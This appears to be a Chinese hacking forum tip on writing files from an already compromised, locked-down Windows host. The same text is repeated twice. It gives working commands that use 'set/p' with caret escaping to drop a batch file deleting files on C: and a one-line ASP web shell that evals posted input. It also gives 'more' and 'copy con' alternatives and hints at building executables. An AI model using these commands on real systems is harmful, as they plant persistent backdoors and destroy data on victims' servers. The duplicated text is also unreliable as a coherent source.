利用安全策略禁止本地主机连接去对方任何端口!
然后在允许别人连接自己的80端口!
把debug/ftp/tftp/its/start/net/net1/echo/edit去掉!本地只提供web服务!
关闭/过滤所有端口,现在得到这个主机一个shell,有办法上穿文件?
呵呵 改内核去掉了echo?
别怕 我们还有set 嘛
set/p allyesno=del c:/.>allyesno.bat
如果遇到转义字符就是^了 嘎嘎。。。
set/p allyesno=^<SCRIPT RUNAT^=SERVER LANGUAGE^=JAVASCRIPT^>eval^(Request.form^('^#'^)+''^)^</SCRIPT^>>allyesno.asp
续假如对方是个BT
more>allyesno.asp
copy con allyesno.asp
结尾要以ctrl+Z结束 按F6不行
可以输入任意代码(包括回车) 如果是以com作为后缀
还可以 写成可执行文件(不用debug,嘎嘎 写法自己思索一下)
然后在允许别人连接自己的80端口!
把debug/ftp/tftp/its/start/net/net1/echo/edit去掉!本地只提供web服务!
关闭/过滤所有端口,现在得到这个主机一个shell,有办法上穿文件?
呵呵 改内核去掉了echo?
别怕 我们还有set 嘛
set/p allyesno=del c:/.>allyesno.bat
如果遇到转义字符就是^了 嘎嘎。。。
set/p allyesno=^<SCRIPT RUNAT^=SERVER LANGUAGE^=JAVASCRIPT^>eval^(Request.form^('^#'^)+''^)^</SCRIPT^>>allyesno.asp
续假如对方是个BT
more>allyesno.asp
copy con allyesno.asp
结尾要以ctrl+Z结束 按F6不行
可以输入任意代码(包括回车) 如果是以com作为后缀
还可以 写成可执行文件(不用debug,嘎嘎 写法自己思索一下)